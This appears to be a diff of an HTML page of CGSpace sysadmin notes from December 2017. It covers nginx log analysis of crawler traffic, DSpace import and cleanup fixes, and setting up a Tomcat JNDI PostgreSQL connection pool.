The list of connections to XMLUI and REST API for today:
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -60,12 +60,12 @@ The list of connections to XMLUI and REST API for today:
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -111,7 +111,7 @@ The list of connections to XMLUI and REST API for today:
<p class="blog-post-meta">
<time datetime="2017-12-01T13:53:54+03:00">Fri Dec 01, 2017</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -123,7 +123,7 @@ The list of connections to XMLUI and REST API for today:
<li>PostgreSQL activity says there are 115 connections currently</li>
<li>The list of connections to XMLUI and REST API for today:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;1/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
763 2.86.122.76
907 207.46.13.94
1018 157.55.39.206
@ -137,12 +137,12 @@ The list of connections to XMLUI and REST API for today:
</code></pre><ul>
<li>The number of DSpace sessions isn&rsquo;t even that high:</li>
</ul>
<pre><code>$ cat /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ cat /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
5815
</code></pre><ul>
<li>Connections in the last two hours:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;1/Dec/2017:(09|10)&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017:(09|10)&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
78 93.160.60.22
101 40.77.167.122
113 66.249.66.70
@ -157,18 +157,18 @@ The list of connections to XMLUI and REST API for today:
<li>What the fuck is going on?</li>
<li>I&rsquo;ve never seen this 2.86.122.76 before, it has made quite a few unique Tomcat sessions today:</li>
</ul>
<pre><code>$ grep 2.86.122.76 /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 2.86.122.76 /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
822
</code></pre><ul>
<li>Appears to be some new bot:</li>
</ul>
<pre><code>2.86.122.76 - - [01/Dec/2017:09:02:53 +0000] &quot;GET /handle/10568/78444?show=full HTTP/1.1&quot; 200 29307 &quot;-&quot; &quot;Mozilla/3.0 (compatible; Indy Library)&quot;
<pre tabindex="0"><code>2.86.122.76 - - [01/Dec/2017:09:02:53 +0000] &#34;GET /handle/10568/78444?show=full HTTP/1.1&#34; 200 29307 &#34;-&#34; &#34;Mozilla/3.0 (compatible; Indy Library)&#34;
</code></pre><ul>
<li>I restarted Tomcat and everything came back up</li>
<li>I can add Indy Library to the Tomcat crawler session manager valve but it would be nice if I could simply remap the user agent in nginx</li>
<li>I will also add &lsquo;Drupal&rsquo; to the Tomcat crawler session manager valve because there are Drupals out there harvesting and they should be considered as bots</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;1/Dec/2017&quot; | grep Drupal | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017&#34; | grep Drupal | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
3 54.75.205.145
6 70.32.83.92
14 2a01:7e00::f03c:91ff:fe18:7396
@ -206,7 +206,7 @@ The list of connections to XMLUI and REST API for today:
<li>I don&rsquo;t see any errors in the DSpace logs but I see in nginx&rsquo;s access.log that UptimeRobot was returned with HTTP 499 status (Client Closed Request)</li>
<li>Looking at the REST API logs I see some new client IP I haven&rsquo;t noticed before:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &quot;6/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;6/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
18 95.108.181.88
19 68.180.229.254
30 207.46.13.151
@ -228,7 +228,7 @@ The list of connections to XMLUI and REST API for today:
<li>I looked just now and see that there are 121 PostgreSQL connections!</li>
<li>The top users right now are:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;7/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;7/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
838 40.77.167.11
939 66.249.66.223
1149 66.249.66.206
@ -243,24 +243,24 @@ The list of connections to XMLUI and REST API for today:
<li>We&rsquo;ve never seen 124.17.34.60 before, but it&rsquo;s really hammering us!</li>
<li>Apparently it is from China, and here is one of its user agents:</li>
</ul>
<pre><code>Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)
<pre tabindex="0"><code>Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)
</code></pre><ul>
<li>It is responsible for 4,500 Tomcat sessions today alone:</li>
</ul>
<pre><code>$ grep 124.17.34.60 /home/cgspace.cgiar.org/log/dspace.log.2017-12-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 124.17.34.60 /home/cgspace.cgiar.org/log/dspace.log.2017-12-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
4574
</code></pre><ul>
<li>I&rsquo;ve adjusted the nginx IP mapping that I set up last month to account for 124.17.34.60 and 124.17.34.59 using a regex, as it&rsquo;s the same bot on the same subnet</li>
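<li>The adjusted mapping is roughly this (a sketch of the regex form, not the exact deployed config):</li>
</ul>
<pre tabindex="0"><code>map $remote_addr $ua {
    # 2017-12: same Chinese bot on two adjacent addresses
    ~^124\.17\.34\.(59|60)$  'ChineseBot';
    default                  $http_user_agent;
}
</code></pre><ul>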
<li>I was running the DSpace cleanup task manually and it hit an error:</li>
</ul>
<pre><code>$ /home/cgspace.cgiar.org/bin/dspace cleanup -v
<pre tabindex="0"><code>$ /home/cgspace.cgiar.org/bin/dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(144666) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(144666) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is like I discovered in <a href="/cgspace-notes/2017-04">2017-04</a>, to set the <code>primary_bitstream_id</code> to null:</li>
</ul>
<pre><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (144666);
<pre tabindex="0"><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (144666);
UPDATE 1
</code></pre><h2 id="2017-12-13">2017-12-13</h2>
<ul>
@ -294,12 +294,12 @@ UPDATE 1
</li>
<li>I did a test import of the data locally after building with SAFBuilder but for some reason I had to specify the collection (even though the collections were specified in the <code>collection</code> field)</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; ~/dspace/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/89338 --source /Users/aorth/Downloads/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat --mapfile=/tmp/ccafs.map &amp;&gt; /tmp/ccafs.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/89338 --source /Users/aorth/Downloads/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat --mapfile=/tmp/ccafs.map &amp;&gt; /tmp/ccafs.log
</code></pre><ul>
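<li>For reference, each item directory in the SAF bundle should contain a <code>collections</code> file that is just a list of collection handles, one per line; spot checking them would look something like this (output is what I would expect, not verified):</li>
</ul>
<pre tabindex="0"><code>$ cat /tmp/ccafs-2016/SimpleArchiveFormat/*/collections | sort -u
10568/89338
</code></pre><ul>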
<li>It&rsquo;s the same on DSpace Test, I can&rsquo;t import the SAF bundle without specifying the collection:</li>
</ul>
<pre><code>$ dspace import --add --eperson=aorth@mjanja.ch --mapfile=/tmp/ccafs.map --source=/tmp/ccafs-2016/SimpleArchiveFormat
No collections given. Assuming 'collections' file inside item directory
<pre tabindex="0"><code>$ dspace import --add --eperson=aorth@mjanja.ch --mapfile=/tmp/ccafs.map --source=/tmp/ccafs-2016/SimpleArchiveFormat
No collections given. Assuming &#39;collections&#39; file inside item directory
Adding items from directory: /tmp/ccafs-2016/SimpleArchiveFormat
Generating mapfile: /tmp/ccafs.map
Processing collections file: collections
@ -321,14 +321,14 @@ Elapsed time: 2 secs (2559 msecs)
</code></pre><ul>
<li>I even tried to debug it by adding verbose logging to the <code>JAVA_OPTS</code>:</li>
</ul>
<pre><code>-Dlog4j.configuration=file:/Users/aorth/dspace/config/log4j-console.properties -Ddspace.log.init.disable=true
<pre tabindex="0"><code>-Dlog4j.configuration=file:/Users/aorth/dspace/config/log4j-console.properties -Ddspace.log.init.disable=true
</code></pre><ul>
<li>&hellip; but the error message was the same, just with more INFO noise around it</li>
<li>For now I&rsquo;ll import into a collection in DSpace Test but I&rsquo;m really not sure what&rsquo;s up with this!</li>
<li>Linode alerted that CGSpace was using high CPU from 4 to 6 PM</li>
<li>The logs for today show the CORE bot (137.108.70.7) being active in XMLUI:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;17/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;17/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
671 66.249.66.70
885 95.108.181.88
904 157.55.39.96
@ -342,7 +342,7 @@ Elapsed time: 2 secs (2559 msecs)
</code></pre><ul>
<li>And then some CIAT bot (45.5.184.196) is actively hitting API endpoints:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;17/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;17/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
33 68.180.229.254
48 157.55.39.96
51 157.55.39.179
@ -371,7 +371,7 @@ Elapsed time: 2 secs (2559 msecs)
<li>Linode alerted this morning that there was high outbound traffic from 6 to 8 AM</li>
<li>The XMLUI logs show that the CORE bot from last night (137.108.70.7) is very active still:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;18/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
190 207.46.13.146
191 197.210.168.174
202 86.101.203.216
@ -385,7 +385,7 @@ Elapsed time: 2 secs (2559 msecs)
</code></pre><ul>
<li>On the API side (REST and OAI) there is still the same CIAT bot (45.5.184.196) from last night making quite a number of requests this morning:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;18/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
7 104.198.9.108
8 185.29.8.111
8 40.77.167.176
@ -402,7 +402,7 @@ Elapsed time: 2 secs (2559 msecs)
<li>Linode alerted that CGSpace was using 396.3% CPU from 12 to 2 PM</li>
<li>The REST and OAI API logs look pretty much the same as earlier this morning, but there&rsquo;s a new IP harvesting XMLUI:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;18/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
360 95.108.181.88
477 66.249.66.90
526 86.101.203.216
@ -416,17 +416,17 @@ Elapsed time: 2 secs (2559 msecs)
</code></pre><ul>
<li>2.86.72.181 appears to be from Greece, and has the following user agent:</li>
</ul>
<pre><code>Mozilla/3.0 (compatible; Indy Library)
<pre tabindex="0"><code>Mozilla/3.0 (compatible; Indy Library)
</code></pre><ul>
<li>Surprisingly it seems they are re-using their Tomcat session for all those 17,000 requests:</li>
</ul>
<pre><code>$ grep 2.86.72.181 dspace.log.2017-12-18 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 2.86.72.181 dspace.log.2017-12-18 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1
</code></pre><ul>
<li>I guess there&rsquo;s nothing I can do to them for now</li>
<li>In other news, I am curious how many PostgreSQL connection pool errors we&rsquo;ve had in the last month:</li>
</ul>
<pre><code>$ grep -c &quot;Cannot get a connection, pool error Timeout waiting for idle object&quot; dspace.log.2017-1* | grep -v :0
<pre tabindex="0"><code>$ grep -c &#34;Cannot get a connection, pool error Timeout waiting for idle object&#34; dspace.log.2017-1* | grep -v :0
dspace.log.2017-11-07:15695
dspace.log.2017-11-08:135
dspace.log.2017-11-17:1298
@ -456,7 +456,7 @@ dspace.log.2017-12-07:2769
<li>So I restarted Tomcat 7 and restarted the imports</li>
<li>I assume the PostgreSQL transactions were fine but I will remove the Discovery index for their community and re-run the light-weight indexing to hopefully re-construct everything:</li>
</ul>
<pre><code>$ dspace index-discovery -r 10568/42211
<pre tabindex="0"><code>$ dspace index-discovery -r 10568/42211
$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
</code></pre><ul>
<li>The PostgreSQL issues are getting out of control, I need to figure out how to enable connection pools in Tomcat!</li>
@ -476,7 +476,7 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
<li>I re-deployed the <code>5_x-prod</code> branch on CGSpace, applied all system updates, and restarted the server</li>
<li>Looking through the dspace.log I see this error:</li>
</ul>
<pre><code>2017-12-19 08:17:15,740 ERROR org.dspace.statistics.SolrLogger @ Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
<pre tabindex="0"><code>2017-12-19 08:17:15,740 ERROR org.dspace.statistics.SolrLogger @ Error CREATEing SolrCore &#39;statistics-2010&#39;: Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
</code></pre><ul>
<li>I don&rsquo;t have time now to look into this but the Solr sharding has long been an issue!</li>
<li>Looking into using JDBC / JNDI to provide a database pool to DSpace</li>
@ -484,28 +484,28 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
<li>First, I uncomment <code>db.jndi</code> in <em>dspace/config/dspace.cfg</em></li>
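<li>As a sketch, that line in <em>dspace.cfg</em> simply names the JNDI resource (the value shown here is an assumption, but it must match the <code>Resource</code> and <code>ResourceLink</code> below):</li>
</ul>
<pre><code>db.jndi = jdbc/dspace
</code></pre><ul>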
<li>Then I create a global <code>Resource</code> in the main Tomcat <em>server.xml</em> (inside <code>GlobalNamingResources</code>):</li>
</ul>
<pre><code>&lt;Resource name=&quot;jdbc/dspace&quot; auth=&quot;Container&quot; type=&quot;javax.sql.DataSource&quot;
driverClassName=&quot;org.postgresql.Driver&quot;
url=&quot;jdbc:postgresql://localhost:5432/dspace&quot;
username=&quot;dspace&quot;
password=&quot;dspace&quot;
initialSize='5'
maxActive='50'
maxIdle='15'
minIdle='5'
maxWait='5000'
validationQuery='SELECT 1'
testOnBorrow='true' /&gt;
<pre tabindex="0"><code>&lt;Resource name=&#34;jdbc/dspace&#34; auth=&#34;Container&#34; type=&#34;javax.sql.DataSource&#34;
driverClassName=&#34;org.postgresql.Driver&#34;
url=&#34;jdbc:postgresql://localhost:5432/dspace&#34;
username=&#34;dspace&#34;
password=&#34;dspace&#34;
initialSize=&#39;5&#39;
maxActive=&#39;50&#39;
maxIdle=&#39;15&#39;
minIdle=&#39;5&#39;
maxWait=&#39;5000&#39;
validationQuery=&#39;SELECT 1&#39;
testOnBorrow=&#39;true&#39; /&gt;
</code></pre><ul>
<li>Most of the parameters are from comments by Mark Wood about his JNDI setup: <a href="https://jira.duraspace.org/browse/DS-3564">https://jira.duraspace.org/browse/DS-3564</a></li>
<li>Then I add a <code>ResourceLink</code> to each web application context:</li>
</ul>
<pre><code>&lt;ResourceLink global=&quot;jdbc/dspace&quot; name=&quot;jdbc/dspace&quot; type=&quot;javax.sql.DataSource&quot;/&gt;
<pre tabindex="0"><code>&lt;ResourceLink global=&#34;jdbc/dspace&#34; name=&#34;jdbc/dspace&#34; type=&#34;javax.sql.DataSource&#34;/&gt;
</code></pre><ul>
<li>I am not sure why several guides show configuration snippets for <em>server.xml</em> and web application contexts that use both a local and a global JDBC resource&hellip;</li>
<li>When DSpace can&rsquo;t find the JNDI context (for whatever reason) you will see this in the dspace logs:</li>
</ul>
<pre><code>2017-12-19 13:12:08,796 ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspace
<pre tabindex="0"><code>2017-12-19 13:12:08,796 ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspace
javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Context. Unable to find [jdbc].
at org.apache.naming.NamingContext.lookup(NamingContext.java:825)
at org.apache.naming.NamingContext.lookup(NamingContext.java:173)
@ -535,11 +535,11 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
</code></pre><ul>
<li>And indeed the Catalina logs show that it failed to set up the JDBC driver:</li>
</ul>
<pre><code>org.apache.tomcat.dbcp.dbcp.SQLNestedException: Cannot load JDBC driver class 'org.postgresql.Driver'
<pre tabindex="0"><code>org.apache.tomcat.dbcp.dbcp.SQLNestedException: Cannot load JDBC driver class &#39;org.postgresql.Driver&#39;
</code></pre><ul>
<li>There are several copies of the PostgreSQL driver installed by DSpace:</li>
</ul>
<pre><code>$ find ~/dspace/ -iname &quot;postgresql*jdbc*.jar&quot;
<pre tabindex="0"><code>$ find ~/dspace/ -iname &#34;postgresql*jdbc*.jar&#34;
/Users/aorth/dspace/webapps/jspui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
/Users/aorth/dspace/webapps/oai/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
/Users/aorth/dspace/webapps/xmlui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
@ -548,7 +548,7 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
</code></pre><ul>
<li>These apparently come from the main DSpace <code>pom.xml</code>:</li>
</ul>
<pre><code>&lt;dependency&gt;
<pre tabindex="0"><code>&lt;dependency&gt;
&lt;groupId&gt;postgresql&lt;/groupId&gt;
&lt;artifactId&gt;postgresql&lt;/artifactId&gt;
&lt;version&gt;9.1-901-1.jdbc4&lt;/version&gt;
@ -556,13 +556,13 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
</code></pre><ul>
<li>So WTF? Let&rsquo;s try copying one to Tomcat&rsquo;s lib folder and restarting Tomcat:</li>
</ul>
<pre><code>$ cp ~/dspace/lib/postgresql-9.1-901-1.jdbc4.jar /usr/local/opt/tomcat@7/libexec/lib
<pre tabindex="0"><code>$ cp ~/dspace/lib/postgresql-9.1-901-1.jdbc4.jar /usr/local/opt/tomcat@7/libexec/lib
</code></pre><ul>
<li>Oh that&rsquo;s fantastic, now at least Tomcat doesn&rsquo;t print an error during startup so I guess it succeeds in creating the JNDI pool</li>
<li>DSpace starts up but I have no idea if it&rsquo;s using the JNDI configuration because I see this in the logs:</li>
</ul>
<pre><code>2017-12-19 13:26:54,271 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS is '{}'PostgreSQL
2017-12-19 13:26:54,277 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS driver version is '{}'9.5.10
<pre tabindex="0"><code>2017-12-19 13:26:54,271 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS is &#39;{}&#39;PostgreSQL
2017-12-19 13:26:54,277 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS driver version is &#39;{}&#39;9.5.10
2017-12-19 13:26:54,293 INFO org.dspace.storage.rdbms.DatabaseUtils @ Loading Flyway DB migrations from: filesystem:/Users/aorth/dspace/etc/postgres, classpath:org.dspace.storage.rdbms.sqlmigration.postgres, classpath:org.dspace.storage.rdbms.migration
2017-12-19 13:26:54,306 INFO org.flywaydb.core.internal.dbsupport.DbSupportFactory @ Database: jdbc:postgresql://localhost:5432/dspacetest (PostgreSQL 9.5)
</code></pre><ul>
@ -580,7 +580,7 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
</li>
<li>After adding the <code>Resource</code> to <em>server.xml</em> on Ubuntu I get this in Catalina&rsquo;s logs:</li>
</ul>
<pre><code>SEVERE: Unable to create initial connections of pool.
<pre tabindex="0"><code>SEVERE: Unable to create initial connections of pool.
java.sql.SQLException: org.postgresql.Driver
...
Caused by: java.lang.ClassNotFoundException: org.postgresql.Driver
@ -589,17 +589,17 @@ Caused by: java.lang.ClassNotFoundException: org.postgresql.Driver
<li>I tried installing Ubuntu&rsquo;s <code>libpostgresql-jdbc-java</code> package but Tomcat still can&rsquo;t find the class</li>
<li>Let me try to symlink the lib into Tomcat&rsquo;s libs:</li>
</ul>
<pre><code># ln -sv /usr/share/java/postgresql.jar /usr/share/tomcat7/lib
<pre tabindex="0"><code># ln -sv /usr/share/java/postgresql.jar /usr/share/tomcat7/lib
</code></pre><ul>
<li>Now Tomcat starts but the localhost container has errors:</li>
</ul>
<pre><code>SEVERE: Exception sending context initialized event to listener instance of class org.dspace.app.util.DSpaceContextListener
<pre tabindex="0"><code>SEVERE: Exception sending context initialized event to listener instance of class org.dspace.app.util.DSpaceContextListener
java.lang.AbstractMethodError: Method org/postgresql/jdbc3/Jdbc3ResultSet.isClosed()Z is abstract
</code></pre><ul>
<li>Could be a version issue or something since the Ubuntu package provides 9.2 and DSpace&rsquo;s are 9.1&hellip;</li>
<li>Let me try to remove it and copy in DSpace&rsquo;s:</li>
</ul>
<pre><code># rm /usr/share/tomcat7/lib/postgresql.jar
<pre tabindex="0"><code># rm /usr/share/tomcat7/lib/postgresql.jar
# cp [dspace]/webapps/xmlui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar /usr/share/tomcat7/lib/
</code></pre><ul>
<li>Wow, I think that actually works&hellip;</li>
@ -608,12 +608,12 @@ java.lang.AbstractMethodError: Method org/postgresql/jdbc3/Jdbc3ResultSet.isClos
<li>Also, since I commented out all the db parameters in DSpace.cfg, how does the command line <code>dspace</code> tool work?</li>
<li>Let&rsquo;s try the upstream JDBC driver first:</li>
</ul>
<pre><code># rm /usr/share/tomcat7/lib/postgresql-9.1-901-1.jdbc4.jar
<pre tabindex="0"><code># rm /usr/share/tomcat7/lib/postgresql-9.1-901-1.jdbc4.jar
# wget https://jdbc.postgresql.org/download/postgresql-42.1.4.jar -O /usr/share/tomcat7/lib/postgresql-42.1.4.jar
</code></pre><ul>
<li>DSpace command line fails unless db settings are present in dspace.cfg:</li>
</ul>
<pre><code>$ dspace database info
<pre tabindex="0"><code>$ dspace database info
Caught exception:
java.sql.SQLException: java.lang.ClassNotFoundException:
at org.dspace.storage.rdbms.DataSourceInit.getDatasource(DataSourceInit.java:171)
@ -633,7 +633,7 @@ Caused by: java.lang.ClassNotFoundException:
</code></pre><ul>
<li>And in the logs:</li>
</ul>
<pre><code>2017-12-19 18:26:56,971 ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspace
<pre tabindex="0"><code>2017-12-19 18:26:56,971 ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspace
javax.naming.NoInitialContextException: Need to specify class name in environment or system property, or as an applet parameter, or in an application resource file: java.naming.factory.initial
at javax.naming.spi.NamingManager.getInitialContext(NamingManager.java:662)
at javax.naming.InitialContext.getDefaultInitCtx(InitialContext.java:313)
@ -669,7 +669,7 @@ javax.naming.NoInitialContextException: Need to specify class name in environmen
<li>There are short bursts of connections up to 10, but it generally stays around 5</li>
<li>Test and import 13 records to CGSpace for Abenet:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchiveFormat -m systemoffice.map &amp;&gt; systemoffice.log
</code></pre><ul>
<li>The fucking database went from 47 to 72 to 121 connections while I was importing so it stalled.</li>
@ -677,7 +677,7 @@ $ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchi
<li>There was an initial connection storm of 50 PostgreSQL connections, but then it settled down to 7</li>
<li>After that CGSpace came up fine and I was able to import the 13 items just fine:</li>
</ul>
